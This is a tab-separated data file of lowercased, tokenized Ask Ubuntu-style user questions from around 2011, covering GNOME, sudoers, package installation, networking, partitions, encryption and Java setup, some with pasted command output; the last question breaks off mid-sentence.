78570	gnome-shell panel disappeared - how to get it back ?	i am on gnome-shell and using ubuntu 11.10 . the problem is after a recent update and also after installing a few extensions , when i logged in to gnome shell , i ca n't find the top panel or awn . only the wallpaper is showing and then conky is displaying . it also seems to me that for some reason the display effects are not working and that is why awn is not showing . need your help to get back the panel .
78577	how do i allow a group ( except one user in that group ) to use sudo without a password ?	how do i allow an entire group , except a certain user in that group , to use sudo without providing password ?
78581	how to archive files with multiple conditions ?	how do i find all files in a folder ( including subfolders ) with extension jpg or bmp , with size between 6 and 46 kilobytes , last modified between 11 and 19 june 2011 or between 24 july and 2 august inclusively and add all these files to an archive ( bzip2 ) ?
78582	what is uefi and secure boot ? how do they affect ubuntu ?	discussions and reports about uefi and secure boot has cropped up in many linux circles , but can anyone summarize it 's impacts on ubuntu and how it affects the general users ? i know that uefi and secure boot are separate ( not interchangeable ) , with secure boot being a part of the unified extensible firmware interface bios specification . ps i do know how it affects ubuntu , this question is for the benefit of public knowledge .
78583	unable to update packages ?	when i was updating ubuntu , it got stuck when updating adobe flash so i turned the computer off . now when i try to update it does n't work . can someone help please ?
78588	find out what account an application runs as	im in the middle of trying to set up a tomcat environment on my development machine . im having trouble running applications , and it looks like its down to file permissions . the directory containing the application is inside my home directory . how can i find out : what account tomcat runs as how to create a new group for tomcat how to add tomcat to that group in order that i can add application specific permissions to my home directory .
78590	gnome shell menu crashes	the gnome menu is crashing when i install the gnome-shell-extensions-alternative-status-menu , installed via terminal or synaptic . when i remove it , the menu stays put . any ideas how to install a shutdown button to the menu without it ? thanks !
78593	what blogging clients are available ?	i regularly blog on both wordpress and blogger platform and as such , desktop clients are far more convenient than browser based clients . when i used windows , i was using a desktop blogging client called windows live writer . are there any ubuntu alternatives for blogging clients available ? features expected : multiple blog support post drafts to the blog save drafts locally add tags / categories upload media
78597	how to get the latest imdbpy in 10.04 lts	i am using ubuntu 10.04 lts . i would like to install the latest imdbpy because the one in the repository has a bug with the country codes . this bug has been fixed in the later versions , but i do n't know how to install the latest version . i do n't have experience in installing python modules/packaes which are not in apt-get . can you tell me how can i either install the latest version from source or use a newer repository for this package ? i would prefer to install from source , as current version now is 4.8.2 and the newest one in the later repositories is still only 4.7.1 . i installed python-setuptools and now when i try to run : sudo easy_install imdbpy it returns : imdb/parser/sql/cutils.c:54:20 : error : python.h : no such file or directory imdb/parser/sql/cutils.c : in function ‘strings_check’ : imdb/parser/sql/cutils.c:74 : warning : implicit declaration of function ‘strlen’ imdb/parser/sql/cutils.c:74 : warning : incompatible implicit declaration of built-in function ‘strlen’ imdb/parser/sql/cutils.c:82 : warning : implicit declaration of function ‘strcmp’ imdb/parser/sql/cutils.c : in function ‘ratcliff’ : imdb/parser/sql/cutils.c:152 : warning : incompatible implicit declaration of built-in function ‘strlen’ imdb/parser/sql/cutils.c : in function ‘strtolower’ : imdb/parser/sql/cutils.c:164 : warning : incompatible implicit declaration of built-in function ‘strlen’ imdb/parser/sql/cutils.c:164 : warning : implicit declaration of function ‘tolower’ imdb/parser/sql/cutils.c : at top level : imdb/parser/sql/cutils.c:169 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘*’ token imdb/parser/sql/cutils.c:207 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘*’ token imdb/parser/sql/cutils.c:254 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘cutils_methods’ imdb/parser/sql/cutils.c : in function ‘initcutils’ : imdb/parser/sql/cutils.c:266 : warning : implicit declaration of function ‘py_initmodule’ imdb/parser/sql/cutils.c:266 : error : ‘cutils_methods’ undeclared ( first use in this function ) imdb/parser/sql/cutils.c:266 : error : ( each undeclared identifier is reported only once imdb/parser/sql/cutils.c:266 : error : for each function it appears in . ) error : setup script exited with error : command 'gcc ' failed with exit status 1
78600	disk utility reports slower initial spinup time via s.m.a.r.t .	i am not sure this is a real question or a bug i should report ubuntu . using : ubuntu 11.10 , on a intel q6600 , samsung spinpoint f4 2tb . i have set my pc on suspend and after i came back , pressed enter and after logging in everything was back to normal . however , i had a message from disk utility that one disk reports errors . i entered disk utility , and my samsung 2tb disk , the one on which my ubuntu is installed , had the smart status turned red , with error message on it . the error was : spinup time failed value 21 , threshold value was 25 ( so the error was reported because 21 < 25 ) i restarted and booted up in windows to see what hd tune is reporting . unfortunately it was exactly the same 21/25 . after reading up on wiki about smart and the errors , i discovered that spinup time is the time required for the disk to reach full spinning speed in milliseconds . then it hit me that , in ubuntu i had suspended the system , making essentially all my hardware stop . and when i rebooted to windows , the hardware does n't really stop , so smart 's reading of the spinup time was still from ubuntu 's suspension . so i did a full pc stop and then booted up again , both in ubuntu and windows to see if there are different readings . both reported successful spinup time , 68 ( a little better then 21 : ) ) , although in disk utility i have a nice message : failed in the past so now i am pretty sure that ubuntu did n't handle the suspend correctly , but then again should i worry about imminent hardware failure ? am i missing some drivers ? should i report this as a bug to ubuntu ? sorry if this was a bad place to ask this question .
78604	problem with network - wireless network working , but wired is n't	i have 2 networks connected to my computer . the wireless connection , that i use for connecting to the internet , and a wired connection that i use for a lan ( eth0 ) , that i also use to share my computer 's internet connection via . ( this goes to a ubuntu server , an xbox and a laptop running mac ( not sure if this makes any difference ! ) ) i have never had any problems with the setup or connection sharing before today . it started to continuously connect and disconnect to the wired network , not effecting the wireless connection . any help fixing this problem would be greatly appreciated ! also , not sure if it will help fix the problem , but here is the ifconfig information ; eth0 link encap : ethernet hwaddr 00:22:68:51:38:71 inet6 addr : fe80 : :222:68ff : fe51:3871/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:1443 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:307663 ( 307.6 kb ) interrupt:43 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1184 ( 1.1 kb ) tx bytes:1184 ( 1.1 kb ) wlan0 link encap : ethernet hwaddr 00:60 : b3 : eb:9c:4e inet addr:192.168.0.203 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :260 : b3ff : feeb:9c4e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9058 errors:0 dropped:0 overruns:0 frame:0 tx packets:9780 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4498374 ( 4.4 mb ) tx bytes:1282373 ( 1.2 mb ) results of ls -lrt /var/log ; total 29924 drwxr-x -- - 2 jetty adm 4096 2010-07-20 22:58 jetty drwxr-xr-x 2 speech-dispatcher root 4096 2011-01-11 16:06 speech-dispatcher drwxr-xr-x 2 root root 4096 2011-04-12 10:22 unattended-upgrades drwxr-xr-x 2 root root 4096 2011-04-18 18:36 apparmor drwxr-xr-x 2 root root 4096 2011-04-25 23:52 fsck -rw-r -- -- - 1 root adm 31 2011-04-25 23:52 boot -rw-r -- r -- 1 root root 0 2011-04-25 23:52 pycentral.log -rw-r -- r -- 1 root root 48382 2011-04-25 23:53 bootstrap.log -rw-r -- -- - 1 syslog adm 0 2011-08-18 14:49 ufw.log -rw-r -- -- - 1 syslog adm 0 2011-08-18 14:49 mail.log drwxr-xr-x 2 root root 4096 2011-08-18 14:49 news -rw-r -- -- - 1 syslog adm 0 2011-08-18 14:49 mail.err -rw-r -- r -- 1 root root 101443 2011-08-18 15:37 xorg.failsafe.log -rw-r -- r -- 1 root root 16888 2011-08-19 17:08 jockey.log.2.gz -rw-r -- r -- 1 root root 6223 2011-08-26 18:59 alternatives.log.3.gz -rw-r -- r -- 1 root root 115067 2011-08-29 22:32 dpkg.log.3.gz -rw-r -- r -- 1 root root 1684 2011-09-01 08:53 pm-powersave.log.3.gz -rw-r -- r -- 1 root root 2173 2011-09-13 00:02 pm-suspend.log.2.gz -rw-r -- r -- 1 root root 7271 2011-09-17 12:28 xorg.2.log.old -rw-r -- r -- 1 root root 7271 2011-09-17 12:28 xorg.3.log.old -rw-r -- r -- 1 root root 7271 2011-09-17 12:28 xorg.4.log.old -rw-r -- r -- 1 root root 7271 2011-09-17 12:28 xorg.5.log.old -rw-r -- r -- 1 root root 7271 2011-09-17 12:29 xorg.2.log -rw-r -- r -- 1 root root 7271 2011-09-17 12:29 xorg.3.log -rw-r -- r -- 1 root root 7271 2011-09-17 12:29 xorg.4.log -rw-r -- r -- 1 root root 7271 2011-09-17 12:29 xorg.5.log -rw-r -- r -- 1 root root 694 2011-09-26 11:55 alternatives.log.2.gz -rw-r -- r -- 1 root root 10622 2011-09-26 11:55 dpkg.log.2.gz -rw-r -- r -- 1 root root 2257 2011-10-01 09:53 pm-powersave.log.2.gz -rw-rw -- -- 1 root utmp 149 2011-10-01 09:53 btmp.1.gz -rw-rw-r -- 1 root utmp 11908 2011-10-01 09:53 wtmp.1.gz -rw-rw -- -- 1 root utmp 384 2011-10-02 18:15 btmp.1 -rw-r -- r -- 1 root root 5213 2011-10-11 21:04 pm-suspend.log.1 drwxrwx -- t 2 root gdm 4096 2011-10-14 19:07 gdm -rw-r -- -- - 1 root adm 314 2011-10-15 02:54 apport.log.1 -rw-r -- r -- 1 root root 2827 2011-10-15 03:15 fontconfig.log -rw-r -- r -- 1 root root 32032 2011-10-15 03:24 faillog -rw-r -- -- - 1 root adm 0 2011-10-15 03:24 apport.log drwxr-xr-x 2 root root 4096 2011-10-15 03:26 installer drwxr-xr-x 3 root root 4096 2011-10-15 03:35 dist-upgrade -rw-r -- r -- 1 root root 53608 2011-10-15 04:14 alternatives.log.1 -rw-r -- -- - 1 syslog adm 850716 2011-10-23 13:56 kern.log.4.gz -rw-r -- -- - 1 syslog adm 6509 2011-10-23 14:17 auth.log.4.gz -rw-r -- r -- 1 root root 1921821 2011-10-25 16:53 dpkg.log.1 -rw-r -- -- - 1 syslog adm 4824 2011-10-30 01:17 auth.log.3.gz -rw-r -- -- - 1 syslog adm 3258932 2011-10-30 01:26 kern.log.3.gz -rw-r -- r -- 1 root root 6933 2011-11-01 19:11 xorg.1.log.old -rw-r -- r -- 1 root root 245934 2011-11-02 21:02 pm-powersave.log.1 -rw-rw-r -- 1 root utmp 401664 2011-11-02 21:02 wtmp.1 drwxr-xr-x 2 root root 4096 2011-11-02 21:26 apt drwxr-xr-x 2 root root 4096 2011-11-02 21:26 consolekit -rw-rw -- -- 1 root utmp 0 2011-11-02 21:26 btmp -rw-r -- -- - 1 syslog adm 3698 2011-11-06 19:17 auth.log.2.gz -rw-r -- -- - 1 syslog adm 69516 2011-11-06 19:40 syslog.7.gz -rw-r -- -- - 1 syslog adm 1436902 2011-11-06 19:40 kern.log.2.gz -rw-r -- -- - 1 syslog adm 24744 2011-11-07 10:54 syslog.6.gz -rw-r -- r -- 1 root root 8368 2011-11-07 11:47 pm-suspend.log -rw-r -- -- - 1 syslog adm 328206 2011-11-08 12:40 syslog.5.gz -rw-r -- -- - 1 syslog adm 199507 2011-11-10 12:32 syslog.4.gz drwxr-xr-x 2 root root 4096 2011-11-11 21:25 lightdm -rw-r -- -- - 1 syslog adm 29968 2011-11-11 21:36 syslog.3.gz -rw-r -- -- - 1 syslog adm 24734 2011-11-12 14:10 syslog.2.gz -rw-rw-r -- 1 root utmp 292292 2011-11-12 19:12 lastlog -rw-r -- r -- 1 root root 6933 2011-11-12 23:01 xorg.1.log -rw-r -- -- - 1 root adm 15597 2011-11-12 23:03 dmesg.4.gz -rw-r -- r -- 1 root root 41505 2011-11-13 01:03 alternatives.log -rw-r -- -- - 1 root adm 15540 2011-11-13 01:26 dmesg.3.gz -rw-r -- -- - 1 syslog adm 64541 2011-11-13 01:31 auth.log.1 drwxr-xr-x 2 root root 4096 2011-11-13 01:32 cups -rw-r -- r -- 1 root root 107678 2011-11-13 01:32 jockey.log.1 -rw-r -- r -- 1 root root 0 2011-11-13 01:32 jockey.log -rw-r -- -- - 1 syslog adm 8895918 2011-11-13 01:32 syslog.1 -rw-r -- -- - 1 syslog adm 7876245 2011-11-13 01:32 kern.log.1 drwxr-xr-x 3 root root 4096 2011-11-13 01:32 samba -rw-r -- r -- 1 root root 297066 2011-11-13 01:32 dpkg.log -rw-r -- -- - 1 root adm 14913 2011-11-13 01:34 dmesg.2.gz -rw-r -- -- - 1 root adm 15332 2011-11-13 02:56 dmesg.1.gz -rw-r -- -- - 1 root adm 66791 2011-11-13 13:29 dmesg.0 -rw-r -- r -- 1 root root 57706 2011-11-13 13:34 xorg.0.log.old -rw-r -- r -- 1 root root 855 2011-11-13 13:36 boot.log -rw-r -- -- - 1 root adm 61037 2011-11-13 13:36 dmesg -rw-r -- r -- 1 root root 347684 2011-11-13 13:36 udev -rw-r -- r -- 1 root root 105706 2011-11-13 13:36 pm-powersave.log -rw-r -- -- - 1 syslog adm 10133 2011-11-13 13:37 auth.log -rw-r -- r -- 1 root root 56540 2011-11-13 13:40 xorg.0.log -rw-rw-r -- 1 root utmp 155136 2011-11-13 13:47 wtmp -rw-r -- -- - 1 syslog adm 422140 2011-11-13 13:47 kern.log -rw-r -- -- - 1 syslog adm 2461489 2011-11-13 13:47 syslog results of netstat -rn ; kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 10.42.43.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 results of ping -c 3 -i eth0 10.42.43.77 ; ( 10.42.43.77 being the ip address of the ubuntu server . ) ping 10.42.43.77 ( 10.42.43.77 ) from 10.42.43.1 eth0 : 56 ( 84 ) bytes of data . 64 bytes from 10.42.43.77 : icmp_req=1 ttl=64 time=7.17 ms -- - 10.42.43.77 ping statistics -- - 3 packets transmitted , 1 received , 66 % packet loss , time 2009ms rtt min/avg/max/mdev = 7.172/7.172/7.172/0.000 ms
78607	what is the root of my application ?	can someone help me understand what is the root of my application ? i would like to use vim and create a one line procfile in the root of my application . then i can test the procfile using a gem called foreman with the following command in my terminal : foreman start i have tried sudo vim /procfile and created the file and saved it in what i thought to be the root . then i typed : foreman start and the response is that procfile does not exist . any help would be most appreciated .
78613	how do i enable the `` universe '' repository from the command line ?	how do you use terminal to enable universe source ? or any those 4 from software sources : main , universe , restricted , multiverse main is on by default and restricted is on if durring ubuntu installation i tick enable restricted formats . answer with line where version checked so it auto detects it . like command i know for partner but that goes to other software tab sudo add-apt-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner ''
78615	disable auto-open for a specific device	whenever i insert a flash drive , a new nautilus window opens showing its contents . is there a way to deactivate `` auto-open '' option for a specific usb unit ?
78616	how to add text and blank line at the beginning of every file in a given directory ?	how do i add a new line at the beginning of every file in /home/johnny containing the text `` hello '' , followed by a blank line ? also , i have to delete every useless space or tab at the ending of every line ( if a line contains only spaces or tabs , they will be deleted , but the line must be kept ) .
78617	installation does n't detect existing partitions	i am trying to install ubuntu 11.10 in a dual boot with my existing windows 7 but the installer does not detect any existing partitions . i have tried resetting my bcd using easybcd and doing fixmbr from the windows startup disc . a while ago i had to use testdisk to recover my partition table so this might be the cause but i have installed ubuntu and windows many times before with no problems . fdisk -l output : disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x360555e5 device boot start end blocks id system /dev/sda1 * 2048 1250274689 625136321 7 hpfs/ntfs/exfat disk /dev/sdf : 7803 mb , 7803174912 bytes 255 heads , 63 sectors/track , 948 cylinders , total 15240576 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f795a8d device boot start end blocks id system /dev/sdf1 * 63 15240575 7620256+ c w95 fat32 ( lba )
78623	ureadahead - how to clear it 's cache ?	i am using xubuntu 11.10 on old laptop with pentium m and 1gb ram . please tell me , how to clear ureadahead cache , so i can build an `` index '' of files again , i would like to improve my system boot time , which takes about 1 minute .
78624	installer hangs for ages then crashes just before the end of the installation process	i am trying to install 11.10 on an acer aspire 5532 , windows 7 is already on the machine and i want to dual boot with ubuntu ( with view to installing some other flavors of linux in other partitions later ) . five times now the installation has failed in the same place , three from a dvd which came with a magazine and twice from a usb drive containing the image from the ubuntu site and prepared with universal usb installer ( so two different sources ) im not sure weather it should matter what kind of partition i am trying to install to but i have tried using extended , logical and plain unallocated space and the same problem each time . also i have tried installing both from within the live environment and from boot time . any ideas what is wrong ? thanks in advance ! ps although no expert i have installed linux on a number of machines over the years and was feeling reasonably confident until now . i am currently just wanting to upgrade from 11.04 to 11.10
78625	did the bios do that ?	i have an old hp dc5000 sff and i updated the bios from 1.00 to 1.43 . before that update , i install ubuntu 11.04 natty narwhal and flickering and tearing occurs everywhere . so i reinstalled windows and flashed the bios and installed ubuntu 11.10 oneiric ocelot . the flickering was gone for some weird reason ... before that , i upgraded from an ubuntu 10.10 maverick meerkat to ubuntu 11.04 natty narwhal and the flickering was also gone . did that bios update fix all this ? my specs are : hp dc5000 business small form factor , ubuntu 11.10 oneiric ocelot 32-bit , intel pentium 4 2.40 ghz , intel 86865g integrated graphics , 0.99 gb ram just tell what happened . just out of curiosity .
78627	problem connecting to webmin	i have installed webmin with the view to try an understand what is all running . yesterday i had it setup with login and password , but today when i try to get access to the server with : https : //ubuntu:10000/ in order to login , i get unable to connect , the page does not load . seems like there is no connection . i tried http : //localhost:10000 and https : //localhost:10000 they both returned the same unable to connect response . i am not sure of what it means to turn https on . ... the https and http is not showing . am i going about this the wrong way ?
78629	can i set different backgrounds for different workspaces ( tags ) in awesome wm ?	i 'd love to be able to set different backgrounds for different tabs in awesome wm . is there a way to do this ?
78633	recover data from partition overwritten by swap partition	i 've just reinstalled ubuntu , and i chose a partition full of data as a swap area . i did n't realize that the swap area would overwrite my files . can i recover my partition or my data now ?
78637	how would you set the default wallpaper zoom type for multiple monitors ?	i am using two dell 17 '' monitors and have them set up fine . its just that when ever i change the wallpaper , the default setting is `` zoom '' but what i want is `` span '' because i have two monitors . is there any way to set `` span '' as the default option when changing wallpapers ? ubuntu 11.10
78638	how to set cli flags for google chrome ?	where can i set cli flags for google chrome on unity ?
78639	why does aptitude want to remove a bunch of files ?	recently i encountered dependencies resolve issues when using aptitude ( it is my favorite ) . nevertheless , i started to feel that aptitude does not behave as it is supposed to be in 64 bits systems while apt-get works fine . can someone confirm that aptitude is buggy in ubuntu 11.10 amd64 ? edit : for example , when tried to install ntfs-config using aptitude , it asked me to remove over 100 packages ( skype for example ) , while using apt-get worked fine . han @ l502x : ~ $ sudo aptitude install ntfs-config [ sudo ] password for han : the following new packages will be installed : ntfs-3g { ab } ntfs-config 0 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/640 kb of archives . after unpacking 2,466 kb will be used . the following packages have unmet dependencies : ntfs-3g : conflicts : ntfsprogs but 2.0.0-1ubuntu4 is installed . the following actions will resolve these dependencies : remove the following packages : 1 ) flashplugin-downloader 2 ) flashplugin-installer 3 ) libasound2 4 ) libasound2-plugins 5 ) libasyncns0 6 ) libatk1.0-0 7 ) libaudio2 8 ) libavahi-client3 9 ) libavahi-common3 10 ) libc6 11 ) libcairo2 12 ) libcomerr2 13 ) libcups2 14 ) libcurl3 15 ) libdatrie1 16 ) libdb5.1 17 ) libdbus-1-3 18 ) libdbusmenu-qt2 19 ) libexpat1 20 ) libffi6 21 ) libflac8 22 ) libfontconfig1 23 ) libfreetype6 24 ) libgcc1 25 ) libgcrypt11 26 ) libgdk-pixbuf2.0-0 27 ) libglib2.0-0 28 ) libgnutls26 29 ) libgpg-error0 30 ) libgssapi-krb5-2 31 ) libgtk2.0-0 32 ) libice6 33 ) libidn11 34 ) libjack-jackd2-0 35 ) libjasper1 36 ) libjpeg62 37 ) libjson0 38 ) libk5crypto3 39 ) libkeyutils1 40 ) libkrb5-3 41 ) libkrb5support0 42 ) liblcms1 43 ) libldap-2.4-2 44 ) libmng1 45 ) libnspr4 46 ) libnspr4-0d 47 ) libnss3 48 ) libnss3-1d 49 ) libogg0 50 ) libpango1.0-0 51 ) libpcre3 52 ) libpixman-1-0 53 ) libpng12-0 54 ) libpulse0 55 ) libqt4-dbus 56 ) libqt4-declarative 57 ) libqt4-network 58 ) libqt4-script 59 ) libqt4-sql 60 ) libqt4-xml 61 ) libqt4-xmlpatterns 62 ) libqtcore4 63 ) libqtgui4 64 ) librtmp0 65 ) libsamplerate0 66 ) libsasl2-2 67 ) libsasl2-modules 68 ) libselinux1 69 ) libsm6 70 ) libsndfile1 71 ) libspeexdsp1 72 ) libsqlite3-0 73 ) libssl1.0.0 74 ) libstdc++6 75 ) libtasn1-3 76 ) libthai0 77 ) libtiff4 78 ) libuuid1 79 ) libvorbis0a 80 ) libvorbisenc2 81 ) libwrap0 82 ) libx11-6 83 ) libxau6 84 ) libxcb-render0 85 ) libxcb-shm0 86 ) libxcb1 87 ) libxcomposite1 88 ) libxcursor1 89 ) libxdamage1 90 ) libxdmcp6 91 ) libxext6 92 ) libxfixes3 93 ) libxft2 94 ) libxi6 95 ) libxinerama1 96 ) libxrandr2 97 ) libxrender1 98 ) libxss1 99 ) libxt6 100 ) libxv1 101 ) nspluginviewer 102 ) nspluginwrapper 103 ) ntfsprogs 104 ) skype 105 ) sni-qt 106 ) zlib1g leave the following dependencies unresolved : 107 ) flashplugin-downloader recommends libasound2-plugins ( > = 1.0.16 ) accept this solution ? [ y/n/q/ ? ]
78640	how can i make swf files be opened with the standalone player ?	i have installed the standalone flash debug player to /usr/lib/flashplayerdebugger and i can now use it to test within flash builder ( eclipse ) , but i ca n't make an swf open with it from nautilus . if i right click and select open with other application it is not in the list of programs , and i ca n't see how to add it . how can i make it the default application for swf files opened in nautilus ? update - *.desktop file [ desktop entry ] name=flash player debuger type=application exec=/usr/lib/flashplayerdebugger categories=gnome ; player ; audiovideo ; mimetype=application/x-shockwave-flash ;
78642	upgrading libreoffice 3.4.3 to 3.4.4	i have libreoffice 3.4.3 ( build:302 ) installed on my ubuntu 11.04 machine as shown below . i have learnt that a new version of libreoffice 3.4.4 is released recently . could some one tell me how can i upgrade it through command-line . i have already tried apt-get update & apt-get upgrade , but no use . thanks . $ sudo apt-cache policy libreoffice libreoffice : installed : ( none ) candidate : 1:3.4.3-3ubuntu2~natty1 version table : 1:3.4.3-3ubuntu2~natty1 0 500 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ natty/main i386 packages 1:3.3.4-0ubuntu1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty-updates/universe i386 packages 1:3.3.2-1ubuntu4 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/universe i386 packages
78649	ca n't suspend or hibernate with an nvidia ti 4200 card	have tried to use previous solutions to hibernate or suspend but system will not boot with modified xorg.conf . using oneric with nvidia ti4200 graphics card and nvidia drivers .
78651	cant boot after trying to install a second hard drive	i tried to install a second hard drive in my pc { not much experience with that } , and when i tried to boot neither the new nor the old drive worked . { the extra drive i added had already windows on it ... } so , i extracted it , and now it seems i screwed up the computer boot because i just get a black screen , after a brief moment with the purpleish unity backdrop . i installed boot repair and ran it , to no avail , i still cant boot . here is the bootinfo summary . http : //paste.ubuntu.com/736719/ what can i do ? i have a lot of university work to do and im quite desperate . thanks in advance !
78657	how do i install the penmountlpc kernel module ?	i would like to install the penmountlpc touchscreen driver in ubuntu 11.10 on a dialogue flybook a33i . when i try installing it using module-assistant from the source packed in penmountlpc-source_1.1_all.deb , i receive the following build error ( see also the full build log ) : # install the module cp penmountlpc.o debian/penmountlpc-modules-3.0.0-12-generic/lib/modules/3.0.0-12-generic/misc cp : can not create regular file `debian/penmountlpc-modules-3.0.0-12-generic/lib/modules/3.0.0-12-generic/misc ' : no such file or directory make [ 1 ] : *** [ binary-modules ] error 1 make [ 1 ] : leaving directory `/usr/src/modules/penmountlpc' make : *** [ kdist_build ] error 2 how can i resolve this problem ?
78658	i ca n't download firefox , just aurora	i try to install firefox , but it just gives me an aurora . i tried : i have tried to install firefox , but i have only been able to get aurora . i tried the following : sudo add-apt-repository ppa : ubuntu-mozilla-security/ppa sudo apt-get update & & sudo apt-get upgrade i want to remove aurora and install firefox , what else can i do ? thanks in advance .
78659	dualboot harddisk encryption	i have a system with both ubuntu 11.10 and windows 7 and i want to encrypt the whole harddisk or at least some of my partitions . my partition table is something like this ( the ones marked with * are the ones that need to be encrypted ) : windows boot reserved partition *windows system partition ( ntfs ) *windows data partition ( ntfs ) ubuntu root partition ( ext4 ) *ubuntu home partition ( ext4 ) ubuntu swap as i said i do n't need to encrypt the whole disk . what is the best way to accomplish this ? maybe something ( truecrypt ? ) where i enter the password before the system boots so that it decrypts the whole hdd ? or maybe individual encryption using windows-only encryption ( for windows partitions ) and ubuntu home encryption ( well , for ubuntu home partition ) ? by the way , i almost always use ubuntu , so it would be nice if i could continue to boot ubuntu by default but have an option to boot windows too ( like in grub ) . edit : i was thinking of doing this : encrypting ubuntu home with ecryptfs ( i think this is used to encrypt home when selected during installation ) . encrypting windows partitions with truecrypt . still having grub as a bootloader , when i choose ubuntu everything goes as normal ( home is decrypted when login in ) . when i choose windows the truecrypt password prompt shows and windows boots .
78664	i need an open source dreamweaver alternative	am using ubuntu and i need an open source dreamweaver alternatives i hope to fide software that help me to do my work perfectly
78665	xubuntu 11.10 wo n't boot without an attached monitor	when i detach the monitor from my computer xubuntu wo n't boot . if i plug in the monitor after a while i can see it 's stuck somewhere ( i see a frozen xubuntu boot screen progress bar ) when i boot with my monitor attached it does boot normally . is there a way to get this to work ? i read somewhere xubuntu even requires a screen while booting . this is supposed to be a headless server where i can ssh/vnc into . btw : no network connections are established either , so i ca n't ssh into the box .
78667	11.10 runs really choppy and slow , but not if i choose `` gnome classic ''	i 'd like to use unity with ubuntu 11.10 , but everything from unity runs really choppy and slow . i have an ati graphics card and i have installed the drivers through `` additional drivers '' . the drivers work , as i can play 3d games flawlessly . when i drag the mouse box around or drag windows around , it is really choppy . i previously had ubuntu 10.10 and everything worked fine . i installed gnome 3 on 11.10 and it does the same thing unity does , very choppy and slow graphics . however , if i choose gnome classic , everything is fine . i can drag the mouse box all around with no problems . i can drag windows around and it looks and feels great . is this a bug with unity ? are others experiencing this ? or is there something i can do to fix this ?
78668	bind command to all keyboard events	hey i have a sentelic touchpad that does n't work very well in linux , its supposed to be all multi-touch and such , it works all right in window . i really am not a fan of using windows though . the worst thing that it does is that it does n't disable itself when typing , so it will always take focus away . i can disable it with modprobe -r psmouse but it would be nice to have it do this automatically . also if you can think of a workaround to re-enable it automatically that would be great : )
78673	how do i finish installing sun jdk after cancelling out of the legal term screen ?	i am a newcomer to linux and have had lots of problems in installing java on my newly installed ubuntu 11.10 . i use a statistical programming environment called r and many of the packages there require java ( the sun variety , i am told ) . i tried the following : sudo add-apt-repository ppa : ferramroberto/java sudo apt-get update sudo apt-get install sun-java6-jre sun-java6-plugin sun-java6-fonts ( after this , i wanted to continue with ( but never got that far ) : sudo apt-get install sun-java6-jdk after this , a window appeared with the heading , `` configuring jre '' , or something like that . below was a long list of legal text about accepting sun 's terms . i did not know how to close this window ( no obvious option like pressing return worked ) . after a long time , when nothing seemed to happen , i finally closed the window . after that , i could not open synaptic . i got the error message : dpkg was interrupted . you must manually run 'sudo dpkg -- configure -a' i did this . but it does not help . i have java as a `` broken '' program . when i try to remove the program from synaptic , i get a message that i must reinstall it again.i do not know what i should do . i want to install jdk6 . and also remove the open jdk which is still persistently present in my system . i tried the clean and purge command shown below . next , i tried to remove the sun-java6-jre from synaptic . i get the following message : e : sun-java6-jre : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . when i tried to follow the procedure suggested in the related question ( from the link suggested below ) , i get the following message on trying to install again : could not mark all packages for installation or upgrade.the following packages have unresolvable dependancies . make sure that all required repositories are added and enabled in the preferences . sun-java6-bin : depends : sun-java6-jre but it is not going to be installed eliah , thanks for your reply . i like your principled stand and your spirited defence of it in the link that you have provided . i will come back to this later ( and about the multiple options and opinions on installing jdk7 ) . i may also have to take the issue of open jdk vs oracle jdk in the r forums . but i must first solve the problem of removing the broken jre program on my installation , which remains unresolved . i show here the results of the command that you suggested : ravi @ ravim1330 : ~ $ sudo apt-get purge sun-java6-jre sun-java6-plugin sun-java6-fonts [ sudo ] password for ravi : reading package lists ... done building dependency tree reading state information ... done package sun-java6-fonts is not installed , so not removed package sun-java6-plugin is not installed , so not removed the following package was automatically installed and is no longer required : java-wrappers use 'apt-get autoremove ' to remove them . the following packages will be removed : sun-java6-jre* 0 upgraded , 0 newly installed , 1 to remove and 26 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing sun-java6-jre ( -- purge ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : sun-java6-jre e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ravi @ ravim1330 : ~ $ i am now happy to report that my problem with the installation of sun jdk6 is now resolved . actually , i did not do much myself . i just ran the update manager and this solved the problem of the broken installation . new programs were loaded . halfway through this update , the window with the legal term screen appeared again . this time , i could tick in one of the boxes stating that i accept the terms ( there was no such box previously , or at least , i did not locate it ) . after that , i went back 